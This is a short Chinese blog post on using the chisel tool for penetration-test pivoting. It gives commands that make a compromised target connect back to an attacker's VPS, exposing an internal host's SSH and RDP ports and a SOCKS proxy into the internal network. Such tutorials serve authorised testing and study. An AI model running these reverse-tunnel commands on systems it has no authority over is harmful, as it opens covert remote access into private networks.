websec80

:: :: :: :: ::

97 随笔 :: 50 文章 :: 3 评论 :: 14万阅读

公告

昵称： websec80
园龄： 8年4个月
粉丝： 10
关注： 0

最新随笔

随笔档案 (94)

文章分类 (48)

文章档案 (50)

阅读排行榜

评论排行榜

推荐排行榜

最新评论

1. Re:针对Vue前后端分离项目的渗透思路
好
--sesmof
2. Re:工具 | Vshell使用入门
师傅还有这个3.3版本的吗，能不能给发一下
--秋水sir
3. Re:Ubuntu下开启MySQL远程连接权限
mark
--WalkTheLine

内网穿透工具chisel

内网穿透工具

下载地址

https://github.com/jpillora/chisel/releases/tag/v1.7.4

使用示例

1. chisel进行ssh内网穿透

//vps上 ./chisel server -p 6666 --reverse //靶机上 ./chisel client -v VPS:6666 R:0.0.0.0:8888:192.168.223.160:22 ./chisel client -v VPS:6666 R:8888:192.168.223.160:22 //攻击机上 ssh -p 8888 root@VPS

2. chisel进行远程桌面代理

//vps上 ./chisel server -p 6666 --reverse //靶机上 chisel.exe client -v VPS:6666 R:0.0.0.0:33389:192.168.223.151:3389 //攻击机上连接vps的33389端口

3. chisel进行socks代理

//vps上 ./chisel server -p 6666 --reverse //靶机上 chisel.exe client VPS:6666 R:socks //随后在vps上 ssh -C -f -N -g -L 0.0.0.0:23333:127.0.0.1:1080 root@VPS //127.0.0.1监听的是本机上的所有流量，0.0.0.0监听的是所有的IP(不论是不是本机的IP)的流量。所以在vps上把127.0.0.1的1080上的socks流量转发到0.0.0.0的23333端口 //攻击机上使用socksCap或者直接在浏览器中设置代理对内网资源进行访问

posted on 2021-03-09 14:56 websec80 阅读(1439) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

【推荐】还在用 ECharts 开发大屏？试试这款永久免费的开源 BI 工具！
【推荐】国内首个AI IDE，深度理解中文开发场景，立即下载体验Trae
【推荐】编程新体验，更懂你的AI，立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包，你的智能百科全书，全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell：AI 加持，快人一步

编辑推荐：
· .NET Core 中如何实现缓存的预热？
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列：向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列：如何用heaptrack跟踪.NET程序的非托管内存泄露

阅读排行：
· TypeScript + Deepseek 打造卜卦网站：技术与玄学的结合
· Manus的开源复刻OpenManus初探
· 三行代码完成国际化适配，妙~啊~
· .NET Core 中如何实现缓存的预热？
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统